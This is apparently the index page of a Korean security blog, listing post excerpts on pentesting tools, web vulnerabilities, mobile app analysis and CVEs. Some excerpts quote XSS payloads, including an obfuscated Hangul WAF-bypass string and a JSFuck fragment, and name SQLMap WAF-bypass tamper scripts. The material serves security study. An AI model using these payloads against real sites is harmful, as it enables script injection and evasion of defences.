이번주중이였나요, kitploit에 눈길이 가는 툴 하나가 올라왔습니다. 바로 Metasploit의 shell sessions을 관리하는 웹 도구인 Kage 입니다. 테스트 좀 해보고 약간 아쉬운 부분도 좀 있지만 그래도 이런 계열의 툴이 많지는 않기에 글로 정리해봅니다. ...

iOS App에서 HTTP 통신 허용하기(+App Trasport Security란?)

iOS 앱 개발 시 테스트를 위해 http 서버와 통신하려고 하면 구동중에 이런 에러가 발생합니다. App Transport Security has blocked a cleartext HTTP (http://) resource load since it is insecure. Temporary exceptions can be...

Javascript Entity XSS에 대한 이야기(old…style…not working)

이런 형태의 xss 코드를 보신적이 있나요? 최근에 이 XSS 페이로드로 트윗에서 의견을 좀 나눴었는데, 그 내용 정리해서 포스팅해봅니다. <br size="&{alert(45);}"> (아 물론 여러 페이로드 정리된 사이트에 존재하는 공격코드입니다. working?? 결론부터 이야기드리면, 실행...

XSS with style tag and onload event handler

지지난주인가.. 트위터 보다가 눈에 들어온 XSS Payload가 있어 공유드립니다. (포스팅해야히고 따로 써놓고, 이제야 글로 쓰네요..) style onload XSS 별다른건 아니고, 기존에 svg/onload와 유사하게 style/onload도 가능하더라구요.. <style/onload=alert(45)>...

Automation exploit with mad-metasploit (db_autopwn module)

My first english article on blog! Please understand if I am wrong because English is not my native language. This time is automation exploit with db_autopwn, mad-metasploit. Let’s s...

postMessage XSS on HackerOne(by adac95) Review

주중에 HackerOne 리포트 뒤적뒤적 찾아보다가 postMessage를 이용한 DOM Base XSS가 있어 공유차 글 작성해봅니다. https://hackerone.com/reports/398054 postMessage XSS? postMessage를 이용하면 크로스 도메인간 데이터 송/수신 및 처리가 가능한데, 이...

SSRF with 30x redirects

오늘도 SSRF 우회 패턴 정리해봅니다. 자주 쓰던 방법 중 하나인데 최근에 제대로 먹혀서 기분이 좋네요. HTTP Redirect를 이용한 우회 방법입니다. What is HTTP Redirect? HTTP Redirect는 HTTP를 사용하는 웹 서비스에서 페이지를 이동하기 위한 Status 코드이자 처리 방식입니다....

Compiler Bomb!

Compiler Bomb라고 들어보셨나요? 취약점 분석 하다가 알게된 부분인데, 종종 상황에 따라 테스팅이 필요할 수도 있어서 간략하게 정리해둡니다. Preprocess 소스코드가 빌드되는 과정은 여러개의 처리 과정으로 나뉘어집니다. 그리고 컴파일전에 Preprocess를 통해 컴파일러에게 전달하기 전 연산 처리를 먼저 진...

DOMAIN CNAME과 A Record를 이용하여 SSRF 우회하기

⚠️ SSRF에 대한 공격/우회방안/대응방안 등은 Cullinan 페이지를 통해 관리하고 있습니다. 더 자세한 정보를 얻고 싶으시다면 Cullinan > SSRF 페이지로 접근 부탁드려요. 참고로 Cullinan > SSRF 가 훨씬 많은 데이터와 최신화된 정보를 다룹니다. SSRF 관련해서 테스트하던 중...

ZAP과 BurpSuite에서의 "handshake alert: unrecognized_name" 에러 해결하기

최근에 일부 테스트환경(hosts 추가한거라 인증서문제가…)에서 이런 에러를 만났습니다. handshake alert: unrecognized_name javax.net.ssl.SSLProtocolException: handshake alert: unrecognized_name’ ZAP , Burp 모두 Java ...

Custom Scheme API Path Manipulation과 트릭을 이용한 API Method 변조

앱을 테스트 하다보면 Custom Scheme에서 발생한 API 요청 중 일부에 대해 주소 변조나 API 로직을 바꿀 수 있는 부분이 있을 때가 있습니다. 다만 실제로 중요한 요청들은 RESTful 하다면 POST/PUT/DELETE 등으로 구현되는데요. 웹을 컨트롤할 수 있는 앱 스킴들은 보통 GET 요청으로 강제되기 때문...

Jenkins RCE Vulnerability via NodeJS(using metasploit module)

최근에 따로 봤었던 내용인데, 톡방으로 관련 내용 공유(https://pentest.com.tr/exploits/Jenkins-Remote-Command-Execution-via-Node-JS-Metasploit.html )받아 이참에 블로그 포스팅으로 작성해봅니다. Summary Jenkins에서 JOB 생성 및 Bu...

MIME Types of script tag (for XSS)

XSS 테스트 도중에 이런 케이스가 있었는데, 실행이 안됬었습니다.. https://gph.is/1yw44rd [ Request ] ?param=alert(45)/*PLAINTEXT*/ [ Response ] <script ...

ClusterFuzz - scalable fuzzing infrastructure(On Google)

트윗 보다가 kitploit에 눈길가는 툴하나 올라와서 간략하게 정리해봅니다. ClusterFuzz라는 도구로 Google에서 사용하고 있는 퍼징 인프라(?) 라고 합니다. CusterFuzz 자체는 퍼징 도구인데, 이를 다른 시스템들과 연결하여 마치 하나의 인프라 처럼 동작한다는 의미인 것 같습니다. 구조 도구 자체...

꼭 봐야할 Metasploit 콘텐츠 4가지

작년부터 mad-metasploit 이란 프로젝트를 살살 진행중입니다. Custom module, resource-script, plugins 등을 지원하고, 결과적으론 awesome 에 들어갈 정도의 수준이 되는게 목표라고 생각합니다. 아무튼 이 mad-metasploit 프로젝트안에서 awesome metasploit ...

CSP(Content-Security-Policy) Bypass technique

⚠️ CSP Bypassing에 대한 기술은 Cullinan > XSS > Bypass CSP에 한번에 정리하고 관리합니다. 해당 글이 훨씬 최신이니 참고 부탁드려요! 오늘은 XSS 시 항상 우리의 발목을 잡는 보안정책인 CSP에 대한 이야기를 하려고 합니다. What is CSP? CSP는 Conten...

APT package manager RCE(Bypass file signatures via CRLF Injection / CVE-2019-3462)

최근에 apt 패키지 매니저 관련해서 RCE 취약점이 나왔었습니다. 물론 쉽게 공격 가능한 조건은 아니라 아주아주아주아주 크리티컬하진 않지만, 그래도 데비안 계열 배포판에선 무조건적으로 쓰이는 패키지 관리 툴이기 떄문에 여파가 좀 있었던 것 같습니다. 관련 내용 올라오자 마자 회사에서 따로 정리헀었는데, 기억 보듬어서 블로...

PHP Hidden webshell with carriage return(\r, hack trick)

오늘 아침에 취약점 몇개 분석하고 보다가 트위터에서 재미있는걸 발견했습니다. PHP Hidden webshell 이란 내용으로 올라온 글인데, 간단한 트릭이지만 저렇게 될거란 생각 조차 안하고 있었네요.. (내가 한심..) (역시 브루트로직 https://twitter.com/brutelogic/status/108772386...

Metasploit-framework 5.0 Review

지난 목요일 Rapid7 블로그에 글이 하나 올라왔습니다. 바로 msf 5.0 즉 major 버전 업데이트에 대한 이야기입니다. 큰 업데이트인만큼 어떤점들이 바뀌는지 살펴보도록 하죠. Summary Rapid7 측에서 이야기한 카테고리는 크게 3가지 입니다. DB, 자동화 관련 API 지원 탐지 우회 모듈, 라...

Hashicorp Consul - RCE via Rexec (Metasploit modules)

아침에 출근길에 edb 보던 중 hashicorp에서 제공하는 consul에 대한 metasploit rce 코드가 올라와서 해당 내용으로 글 작성해 봅니다. 독특한 이슈나 임팩트 있는 건은 아니지만, 그냥 관심있는 툴에 나온 부분이라 그냥..그냥그냥 정리해봅니다. 사실 취약점이라기 보단, 설정이 잘못되어 있는 경우 명령 ...

PocSuite - PoC 코드 테스팅을 체계적으로 쉽게 하자!

knownsec에서 만든 Pocsuite라는 재미있는 툴(+라이브러리)이 있습니다. 활용하기에 따라 테스팅을 많이 편리하게 해줄 수 있는데요, 간략하게 소개해드릴까 합니다. What is Pocsuite? Pocsuite는 PoC 코드를 쉽게 테스트하기 위한 툴입니다. 보통 python, ruby 같은 스크립트로 PoC가 ...

wget stores a file's origin URL vulnerability (CVE-2018-20483)

최근에 twitter에서 wget의 문제점에 대해 이야기가 좀 돌았었습니다. (https://twitter.com/gynvael/status/1077671412847046657 ) 결국은 보안 이슈로 잠정적인 의견이 모이는 분위기였고, 결국 CVE 넘버링을 달게 되었네요. 어떤 이슈고 어떤 리스크를 가질 수 있는지 정리해봅...

Web Cache Poisoning Attack, 다시 재조명 받다(with Header base XSS)

Cache Posoning Attack은 꾀나 전통적인? 공격 방법입니다. Cache에 공격자가 의도한 데이터를 남겨 다른 사용자로 하여금 비정상적인 요청을 수행하게 하죠. (대표적으로 DNS Cache Poisoning) Web에서도 Cache를 사용하는데요, 관련해서 올 8월에 PortSwigger 팀에서 관련해서 글(...

ZAP Add-on before/from-version 변경하여 설치하기(최소 지원버전으로 설치 불가한 경우)

ZAP AddOn 설치 시 ZAP의 최소 지원 버전으로 인해 설치 못하는 경우가 있습니다. 예를 들면 alpha 버전용인데, release엔 포함안되고, market에도 등록 안된 경우 간단하게 Add-on의 설정 파일을 바꿔줘서 강제로 로드할 수 있습니다. ZAP Add-on 구조 우선 간략하게 ZAP Add-on의 구조...

ZAP Java 버전 바꿔치기

ZAP HUD 테스트한다고 alpha 버전 올렸었는데, macOS 에선 인앱 브라우저로 특정 사이트 접근 시 SSL 관련 에러가 발생해서 삽질했던거 정리해둡니다. Linux는 별 문제 없던 걸로 보아 macOS와 연관된 문제인 것 같습니다. SSLHandshakeException: Received fatal alert: h...

OWASP ZAP의 New interface! ZAP HUD 🥽

예전에 ZAP쪽 트윗보고 트위터로 공유해두었던게 있었는데, 최근 @Dakkar Key의 멘션으로 급 생각나서 글로 정리해둡니다. 그땐 정말 많이 대충 봐서 확하게 뭔지 몰랐었는데, 찾아보니 생각보다 좋은 도구인 것 같네요. 오늘 이야기드릴 주제는 OWASP에서 진행중인 ZAP HUD에 대한 이야기입니다. What is Z...

Wordpress Post Type을 이용한 Privilege Escalation 취약점(<= wordpress 5.0.0)

이번주 초에 RIPS 블로그에 wordpress 관련 취약점 내용이 올라와 빠르게 테스트 좀 했었고 관련 내용 정리해둡니다. https://blog.ripstech.com/2018/wordpress-post-type-privilege-escalation/ Wordpress Post Type Post Type은 각 게시글...

JSShell - interactive multi-user web based javascript shell

git 보다가 재미있는 툴 있어 공유드립니다. JSSHELL이라 툴로 XSS Post Exploit 툴 정도로 보심 되고 요약하면 beef의 Command line 버전이라고 생각하시면 좋을 것 같습니다. https://github.com/Den1al/JSShell ╦╔═╗┌─┐┬ ┬┌─┐┬ ┬ ...

MacOS, iOS(iPhone, iPad) Devices 에서의 메모리 변조

보통 안드로이드, iOS 모두 메모리 변조를 할때 치팅 툴(게임 해킹 관련해서 검색하면 많이 나오는 것들..)을 대체로 사용합니다. (솔직히 편하긴해요) Command line에서 제어할 일이 있어서 찾아본 도구중에 괜찮은게 있어 정리해둡니다. MH? https://github.com/sskaje/mh 로 유명한 도구는...

Needle - iOS Application and Device 해킹/보안 분석 프레임워크

Needle은 Drozer로 유명한 MWR Lab에서 만든 iOS 분석용 프레임워크입니다. Drozer와 비슷하게 디바이스에 Agent를 내리고 앱과 디바이스에 대한 분석을 할 수 있습니다. 보통은 Frida + Burp(ZAProxy)의 조합으로 분석을 하는데, 보다보니 Needle이 Frida 사용에 있어 좀 편리한 부...

Windcard(*) Attack on linux (와일드 카드를 이용한 공격)

조금 철 지난 기법이지만 관심이 적어 모르고 있던거라.. 글로 작성해둡니다. wildcard는 굉장히 많은 영역에서 사용되는 문자이고 컴퓨팅, 프로그래밍에선 더더욱 많이 사용되는 문자들입니다. 리눅스 환경에선 정말 보편적으로 쓰이고 있고(명령어 처리, 인자값, 설정 등등..), 프로그래밍시에도 굉장히 많이 사용되는 부분입...

iOS 11.3(iPad mini2 ) Jailbraek with Electra(non-developer accouts)

11.3 버전에 대한 탈옥툴이 나온진 조금 되었느데요, 유독 제 아이패드 미니2에서 탈옥이 잘 안되었었는데, 오늘 오전에 성공하여 시도했던 내용들 같이 기록해둡니다. Electra Jailbreak (iOS 11.2 – 11.3.1) 공식 홈페이지 가서 ipa 파일 받아주시고 Cydia Impactor나 따로 서명하고 i...

iOS에서 Proxy 사용 중 Burp/ZAProxy CA 넣어도 신뢰할 수 없는 사이트 발생 시 해결방법

iOS에서 Burp/ZAProxy CA 인증서 등록하여도 프록시 설정 시 보안 경고가 나는 경우가 있습니다. 물론 매번 예외처리 하면서 할 순 있지만 모바일 앱에선 불가능하기 때문에 통신이 잡히지 않습니다. 무슨 문제인가 하다가 주변에서 힌트를 받아 디바이스 뒤져보다가 메뉴 하나 찾았습니다. (이런거에서 헤맸을줄이야 ㅜㅜ)...

WAF Bypass XSS Payload Only Hangul

어제 뒤적뒤적 웹 서핑하다가 가타카나로 된 공격코드를 보고 한글로도 한번 만들어봐야지 싶어 퇴근길에 폰으로 만들어봤습니다 😊 ([,하,,,,훌]=[]+{},[한,글,페,이,,로,드,ㅋ,,,ㅎ]=[!!하]+!하+하.ㅁ)[훌+=하+ㅎ+ㅋ+한+글+페+훌+한+하+글][훌](로+드+이+글+한+'(45)')() 실제로 테스트해보면...

ZAP Scripting으로 Custom Header

ZAProxy에서 replacer를 이용해 Request/Response 내용 중 일부를 자동으로 변경할 수 있습니다. 물론 추가도 가능하구요.그치만 우리는 때때로 조금 더 디테일한 변경이 요구되기도 합니다. 이때는 script로 넣어두고 쓰면 편리하니 공유드립니다. customHeader.js // This script ...

비루팅/비탈옥 단말에서 프리다 사용하기 (Frida Inject DL for no-jail, no-root)

앱 취약점 분석 시 엄청나게 활용도 높은 프리다. 예전부터 약간 Jailbreak, rooting 단말에서만 동작한다는 편견이 있었는데요. 재미있는 트릭을 이용하면 비루팅/비탈옥 단말에서도 프리다 사용이 가능합니다. 프리다 공식 홈에도 있는 내용이니 참고하시길 바랍니다 :) Frida Gadget Frida 공식 홈에선 F...

iOS App MinimumOSVersion 우회하기 (강제변경)

최근에 iOS 앱 중 최소 설치버전 제한 떄문에 약간 삽질을 했었습니다. 결론부터 말씀드리면 해당 앱 기준으론 성공하지 못했습니다만, 가능성이 없는 방법은 아니기 때문에 블로그 글로 공유해봅니다. minSdkVersion iOS도 Android 처럼 minSdkVersion을 가지고 있으며 Info.plist에 Mini...

Phar(PHP Archive)에서의 PHP Deserialization 취약점 (BlackHat 2018)

시간날때 천천히 못본 blackhat 자료 보고있는데, 눈길을 끄는게 하나 있어 정리해서 글로 작성해봅니다. https://i.blackhat.com/us-18/Thu-August-9/us-18-Thomas-Its-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know...

Burp suite Daracula(dark) Theme Release!

오늘이 할로윈이라 그런가요. Burp 팀에서 좋은 소식을 주었습니다. (어제 밤에 글써놓고 뻗어서 자버렸네요….) 2.0.10beta 버전 업데이트인데요, 정말 기다려왔던 Dark 테마 적용에 대한 업데이트였습니다. (할 수 없어서 이런식으로 쓰고있었지요.. https://www.hahwul.com/2018/07/ow...

Review on recent xss tricks (몇가지 XSS 트릭들 살펴보기)

XSS 테스트 벡터들 자주 찾아보곤(또는 공유받거나 눈에 걸리거나..) 하는데 최근에 포스팅 쓸만큼 특별한건 없었고 간단한 트릭정도 몇개 올라와서 정리해서 한번에 글 작성합니다. details 태그 + ontoggle + open details 태그에 open, ontoggle 속성을 이용해서 바로 스크립트 실행이 가능합니...

iOS에서의 SSL Pinning Bypass(with frida)

피닝 적용이 된 앱들이 좀 있다보니 모바일 앱 분석에선 언피닝이 거의 필수 코스가 되어가고 있습니다. 보통 Frida 코드(짜거나 codeshare에서 가져다 쓰거나)로 우회합니다. #> frida --codeshare dki/ios10-ssl-bypass -U “앱이름" 안드로이드는 피닝을 위해 Certifica...

LOKIDN! 재미있는 IDN HomoGraph Attack 벡터

한 2주전쯤인가요? EDB에서 재미있는 문서 하나를 보았습니다. 서로 다르지만 비슷하게 생긴 문자들 이용한 공격 기법인 IDN Homograph attack으로 웹을 공격하는 재미있는 방법이라 정리해서 글로 공유해봅니다. IDN Homograph attack인 LOKIDN 입니다. IDN IDN은 International...

DynoRoot Exploit (DHCP Client Command Injection / CVE-2018-1111)

전에 이 취약점이 나왔을 때 그냥 dhcp 관련 취약점이 나왔구나 헀었느데, 최근에 다른 취약점 보다보니 이 취약점을 기반으로 한 취약점이 몇몇 보여 글로 풀어봅니다. 오늘 이야기드릴 내용은 DynoRoot Exploit입니다. 철자는 다르지만 뭔가 공룡...

웹 어셈블리(Web Assembly)는 어떻게 보안 취약점 분석을 할까요?

천천히 정리하던 글이 하나 있었는데, 드디어 글로 올리게되었습니다. 오늘 이야기드릴 것은 웹 어셈블리와 보안분석 대한 내용입니다. 웹 어셈블리는 기술 자체가 나온지는 좀 되엇지만, 보안쪽에선 최근에 블랙햇 발표로 이슈가 됬습니다. 관련 앱들이 많이 생길수록 보안적인 사항도 고려해야하기 때문에 글로 좀 정리해둘까 합니다. ...

JSFuck XSS

혹시 이런 XSS 코드 많이들 사용하시나요? 저는 개인적으로 Js 코드 탈출 이후 특수문자~문자열 등 원하는 구문 삽입이 어려울 떄 종종 사용하는 방법입니다. // alert(1) this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[...

XSS Polyglot Challenge(v2)에 참여하며 XSS에 대한 고민을 더 해봅시다!

polyglot이란 여러 환경? 에서도 동작하는 한줄짜리 강력한 테스팅 코드를 의미합니다. 저 또한 가끔씩 테스트할 때 쓰곤하는데, 아무튼 고민해보시고 만들어보시면 분명 좋은겁니다. https://polyglot.innerht.ml/ XSS polyglot Challenge에 대해 들어보셨나요? XSS polyglot...

p0wn-box - 가볍게 사용하기 좋은 모의해킹/침투테스트 툴 도커 이미지

최근에 Docker image 한번 제대로 날려먹은적이 있습니다. 테스트용 칼리….ㅜㅜ (맥은 리눅스와 다르게 세팅을 다 안해놓은지라… 도커에 엄청 의존하고 있었죠) 아무튼 급히 툴 쓸일이 있어서 찾던 중 여러 보안툴 세팅해놓은 Docker project가 있어 공유드릴까 합니다. dotdotpwn 사용 때문에(ssl 문...

Burp Suite REST API(Burp 2.0 beta)

최근에 Burp suite 2.0 Beta 버전이 공개되었습니다. 혹여나 큰 변화가 있을까 공식 블로그랑 주변 반응?(기껏해야 트위터..) 좀 살펴본 이후 burp pro 2.0 으로 업그레이드 하였죠. 2.0의 여러가지 기능 중 가장 눈에 들어온 REST API에 대한 이야기를 잠깐 할까 합니다. REST API of...

Arachni optimizing for fast scanning (Arachni 스캔 속도 향상 시키기)

Arachni를 가지고 재미있는 것들을 하고있는데, 요즘 참 스캔 속도에 대해 고민이 되네요. Arachni 가 벤치 마킹 기준으로 굉장히 좋은 성능을 가지며 오픈소스이지만 결정적으로 어마어마한 스캔 시간이 발목을 잡는 것 같습니다. 처음에는 헤드리스 브라우저인 phantomjs를 전 테스팅 구간에 사용(아니 왜… 크롤링만...

SpEL(Spring Expression Language) Injection & Spring boot RCE

Spring boot으로 구성된 서비스들을 점검할 때 꼭 체크해야할 부분 중 하나가 SpEL RCE 입니다. 가끔식 참고삼아 데드풀이 작성한 글(Spring boot RCE) 보는데요, 오늘은 제 블로그에 좀 정리해둘까 합니다. SpEL Injection에 관한 이야기입니다. SpEL? 우선 간단하게 SpEL에 대해 ...

ESI(Edge Side Include) Injection을 이용한 Web Attack(XSS, Session hijacking, SSRF / blackhat 2018)

주말동안 시간나면 천천히 blackhat, defcon 자료좀 볼까해서 보다보니 글로 공유드리면 괜찮을 것 같은 내용이 있어 포스팅 작성해봅니다. 바로 ESIi(ESI Injection)에 대한 내용입니다. http://i.blackhat.com/us-18/Wed-August-8/us-18-Dion_Marcil-Edge-S...

Defcon 2018 발표 자료 및 Briefings list

최근 Blackhat 2018 USA / Defcon 행사가 진행됬었습니다. 자료도 슬슬 올라오고 어떤 내용의 발표들이 있었는지 Title만 정리해둡니다. (천천히 읽어봐야겠네요, 재미있는건 포스팅하도록 하겠습니다) 자료는 모두 media 서버로 올라와있습니다. https://media.defcon.org/DEF%20C...

ZAP에서도 Request를 가지고 스크립트로 생성하자! Reissue Request Scripter

Reissue Request Scripter는 제가 Burp suite에서도 정말 괜찮다고 생각했던 확장기능 중 하나입니다. Request 정보를 가지고 Ruby, Python, Perl, Javascript 등 여러가지 언어의 코드로 변환할 수 있는 확장 기능이며, 변환된 코드 또한 굉장히 잘 동작하기 떄문에 추가적인 테...

Arachni 코드단에서 JSON Method 사용하기 (undefined method `parse' for Arachni::Element::JSON:Class 해결)

arachni 코드 수정 중 json 사용이 불가능한 경우가 있었습니다. [ Code ] require ‘json' JSON.parse(data) [ Error ] undefined method `parse' for Arachni::Element::JSON:Class JSON은 json library에 모듈로 정...

Attack a JSON CSRF with SWF(ActionScript를 이용한 JSON CSRF 공격코드 구현)

좀 오래된(?) 기법이지만 오늘 페북 버그바운티 포럼쪽에 글 중 JSON CSRF 글 보다보니 예전에 정리해둘까 했던 내용 생각나서 글로 작성합니다. (그와중에 300$받았다고 꺠알 자랑…) 간간히 CSRF 우회 케이스도 글로 쓰고 있는데, XSS Cheatsheet 처럼 모아둬야곘네요. JSON CSRF : htt...

Burp suite Extension 개발에 대한 이야기(Story of Writing Burp suite extension)

최근에 Burp suite Extension 만들고 있던 것 어느정도 완성되다보니 만들면서 느꼈던점들 좀 공유할까 합니다. 완전 처음은 아니지만, 코드량이 생각보다 많아지니 의외로 많은걸 공부하게 되었네요(덕분에 Burp 쪽 API는 확실히 감옵니다. Buby 쓸떄 유용하겠네요) ...

EternalBlue exploit for x86(32 bit) devices - 32비트 pc에 대한 EternalBlue

예전이나 지금이나 인기있는 Windows 취약점이 EternalBlue에 대한 이야기를 할까 합니다. 별다른건 아니고, Metasploit에서 EternalBlue Exploit을 하게되면 Base taget이 64비트 이여서 32비트 PC에는 바로 적용이 어려운데요, 찾다보니 32비트 버전으로 세팅해놓은 분이 있어 내용...

JRuby Burp suite 확장 기능 개발 중 발생한 에러(failed to coerce [Lburp.IHttpRequestResponse; to burp.IHttpRequestResponse)

글 좀 쓰고 자려했는데, 잡다한 일이 꼬여.. 글은 패스하고 간단하게 메모 하나만 작성해둡니다. 어제 Burp 확장 기능을 만들던 중 이상한 에러를 하나 만났는데, 아래와 같습니다. failed to coerce [Lburp.IHttpRequestResponse; to burp.IHttpRequestResponse 코...

Firefox Hackbar Addon 단축키(Short cut)

낮에 Hackbar git을 우연히 들어가게 됬는데(사실 밝은색이라 눈아파서 어둡게 색상좀 바꿀라고..) 단축키가 있더라구요. (이럴수가… Hackbar가 firefox quantum 이후로 개발자 도구로 들어가서 걍 신경 안쓰고 살았느데, 단축키가 생겼네요) 간략하게 메모차 글 작성해둡니다. (요즘 글을 날로먹는 느낌.....

Metasploit으로 서버의 SSL 등급을 평가하자 (SSLLab)

오늘은 Metasploit 모듈 중 SSL Lab API Client 모듈에 대해 소개해드릴까 합니다. SSL 평가(취약점-Cipher 지원 등등) 사이트로 유명한 SSLLab(https://www.ssllabs.com )에선 각 도메인에 대한 SSL에 대한 분석 결과 지표를 제공해줍니다. 보통은 홈페이지에서 직접 돌...

Insomnia로 REST API를 쉽게 테스트하자 😎

오늘 소개해드릴 툴은 REST API 테스팅 툴인 Insomnia 입니다. postman과 같이 API를 테스팅하기 위한 여러가지 기능들을 제공하고 있고, 개발자뿐만 아니라 보안쪽에서도 충분히 자주 사용할 수 있는 도구라서 간단하게 공유드릴까 합니다. Insomnia는 크로스 플랫폼을 지원하며 예전에 깔았을 떈 MACOS ...

XSS 없이 DOM 내 중요정보 탈취, CSP 우회하기(Eavading CSP and Critical data leakage No XSS)

최근 Portsiwgger 블로그에 재미있는 글이 올라와 관려해서 글 작성해봅니다. (https://portswigger.net/blog/evading-csp-with-dom-based-dangling-markup ) csp evasion 기술에 대한 이야기로 웹 브라우저 내 전달받은 token 이나 중요정보에 대한 탈취가...

Security testing SAML SSO Vulnerability & Pentest(SAML SSO 취약점 분석 방법)

한가지 계정정보를 가지고 여러 서비스를 로그온하여 사용하는 경우를 Single Sign On, 즉 SSO 라고 하는데요 오늘은 이 SSO 종류 중 SAML에 대한 이야기와 취약점 분석 방법에 대해 정리할까 합니다. 우선 SSO는 SAML 이외에도 cas, Oauth 등 여러가지가 있습니다. cas 는 쿠키기반이기 때문에 ...

리눅스에서 OWASP ZAP과 BurpSuite의 색상 바꾸기

아주 예전부터 Burp suite, ZAP의 색상을 바꿀 수 있으면 좋겠다는 생각을 했었습니다. 관련해서 양쪽 개발자분꼐 여쭤봤지만 동일하게 코드 수정을 매우 어렵다고 답변 들었습니다. (당연한 이야기…, 역시 자바란) 그러던 중 최근에 트위터로 재미있는 소식을 하나 접했는데요, 리눅스 창 관리자를 약간 이용하면 색상 변환...

SQLMap Tamper Script를 이용한 WAF&Protection Logic Bypass

SQLMap의 Tamper script 관련하여 정리해둡니다. 보통 많이 사용하는 Tamper script --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltol...

ZAP에서 Passive Script 만들기

요즘 몇가지 만들어쓰고 있는데, 간단하게 틀이되는 코드와 대략적인 설명으로 글 작성합니다. ZAP에선 Context menu, passive scan, active scan 등 모든 기능 구간에 대한 기본적인 script template 코드를 제공해주고 있고, 다른 코드 참조해서 작성하면 어렵지 않습니다. 확장기능 만드는...

Subdomain Takeover 취약점에 대한 이야기

오늘은 Subdomain Takeover 취약점에 대한 이야기를 할까 합니다. 어느정도 자동화가 가능하면서도 버그바운티에서도 결과가 좋은 공격 방법이라 알아두시면 두고두고 도움될거라고 생각합니다. 그럼 시작합니다. DNS 우선 취약점에 대한 설명 전 간략하게 CNAME, A레코드에 대해 알고가면 좋습니다. 직접 도메인 구...

ZAP에 필요한 기능과 Burp suite 듀얼 체제로 느낀점

최근에 ZAProxy 관련글을 쭉 작성하고 있습니다. Burp + ZAProxy 구성으로 진단하는 것에 대해 테스트해보고 적응하는 단계였는데, 한 1~2주 지났을까요? 전보다 확실히 익숙해진 것 같습니다. 이젠 단독으로 ZAProxy 써도 크게 불편하진 않을 것 같네요. 오늘은 관련 글의 마지막 부분으로 앞으로 적용해야할 것...

ZAP 단축키 사용 팁

시간도 늦고 피곤해서 잘까하다가, 재빠르게 글 하나 쓰고 자려합니다. 많은 사람들은 단축키를 즐겨 사용합니다. 특히 한국인이라면 빠른 스피드를 위해 단축키를 엄청 잘 활용하죠. 저 또한 손에 익기 시작하면 단축키 활용을 많이 하는 편인데요 오늘은 ZAP에서 단축키를 등록하는 법, 단축키 사용의 나름대로 팁을 공유드릴까 합니...

ZAP Scripting으로 Code Generator 구현하기

ZAProxy와 Burp를 혼용해 쓰면서 불편한 점들을 찾고, 고쳐가고 있습니다. 오늘은 그 중 Code genertor에 대한 이야기를 할까 합니다. Code Generator? 이름 그래도 코드를 생성해주는 기능입니다. 자주 애용하던 기능이라 불편함이 바로 찾아왔는데요, 바로 Code generator 입니다. Burp...

Burp와 ZAP 동시에 사용하기 🚀

최근 ZAP 사용에 대한 고민을 하고있다고 글을 통해 이야기드렸었습니다. 그래서 요즘 듀얼로 사용하면서 Burp와 ZAProxy의 차이점과 툴이 추구하는 방향? 등에 대해 뜻밖의 공부가 되고있는데요, 나름 긴 시간의 Burp suite 생활을 뒤로하고 ZAProxy를 사용해보면서 생겼던 고민과 해결에 대한 이야기로 당분간 ...

Burp suite 중독자가 바라본 OWASP ZAP(Zed Attack Proxy). 이제부터 듀얼이다!

요즘 부쩍 툴에 대한 많은 깊은 고민이 생겼습니다. 어떤 툴을 쓰면 좋을지, 이참에 걍 하나 만들지… 한… 3년? 전쯤에도 같은 고민이 있었죠. 그때는 Burp suite에 올인하기로 마음을 잡았었습니다. 시간이 지난 요즘, 또다시 Burp suite에 대한 지겨움, 새로움을 갈구하는 마음에 여러 고민이 시작되었습니다. 예...

Firefox XSS with Context menu(+css payload)

주말 밤 트위터를 통해 재미난게 있나 구경하던 도중 익숙한 구문이 리트윗 되는 광경을 목격했습니다. 관련해서 링크 읽어보니 재미있는 상황이더군요. 내용을 이야기하자면 현재 동작하지 않던 오래된 XSS 테스팅 코드가 있었는데, 재미있는 버그 하나와 코드를 이용해서 XSS가 가능한 사례인데요. 오늘은 이 내용 관련해서 글을 작성...

Not-rooted android Kali linux with Termux!(비 루팅폰에서 칼리 구성하기)

지난번에 かりまに@kali-mani가 안드로이드 디바이스에 Kali linux를 올렸길래 루팅 상태에서 Nethunter를 사용한건지 물어봤는데 대답은 “No” 였습니다. 그러면서 비 루팅 상태에서 Termux를 통해 설치했다고 이야기 줬는데요. 저도 한번 세팅하면서 글로 남겨둡니다. Termux? Hax4us githu...

YSoSerial - Java object deserialization payload generator

2017년 OWASP TOP10에 새로운 공격 벡터가 올라왔었는데요. 바로 Insecure deserialization 입니다. (https://www.hahwul.com/2017/10/web-hacking-owasp-top-10-2017-rc2-review.html ) 은근히 포인트가 많지만 실제 공격 성공으로 만들기엔 ...

BurpKit - Awesome Burp suite Extender(Burp에서 개발자 도구를 사용하자!)

올해 초 쯤인가요? Payload 관련해서 공유 받은 내용이 있었는데, 알고보니.. 쓸만한 툴을 팍팍 찍어내고 계신 CrowdShield의 1N3의 Git이였습니다. 이중에서 하위 플러그인 디렉토리를 통해 Burp suite 확장기능을 추가로 배포하고 있는데요. 오늘은 그 중 하나인 Burp Kit에 대한 내용으로 글 작성해...

Evasion technique using Wildcards, Quotation marks and backslash, $IFS(WAF, 방어로직 우회)

WildCards? Wildcard는 OS에서 파일에 대해 다중처리를 위해 사용되는 기호입니다. 보편적으로 많이 사용하는건 * ? 등이 있고 덕분에 번거로운 작업을 한번에 처리할 수 있게 되죠. 뭐 대충 이런 경우이죠. #> rm *.txt => .txt 로 끝나는 모든 파일을 삭제하라. 정리해보면 이정도 문...

Android App(apk) 서명하기(apk signing with jarsigner,keytool)

앱 코드 좀 고치고 리패키징 후 아무생각 없이 설치하다 보니 에러가 발생합니다. [INSTALL_PARSE_FAILED_NO_CERTIFICATES] apktool로 리패키징한 경우 자동으로 서명되지 않기 때문에 설치가 불가능해집니다. 보편적인 IDE는 자동으로 dev key로 서명을 해주지만, 아닌 경우에는 직접 서명...

Metasploit WMAP 모듈들

Groups wmap_ssl: ssl 버전과 상태에게 대해 체크 wmap_serverP: 웹 서버(+web_app) 설정에 대한 체크 wmap_dir: directory에 대한 brute force, method 체크 등 wmap_file: file 기반의 brute force(backup 파일 같은거) ...

Android Meterpreter shell 에서의 실행 권한 상승 삽질 이야기

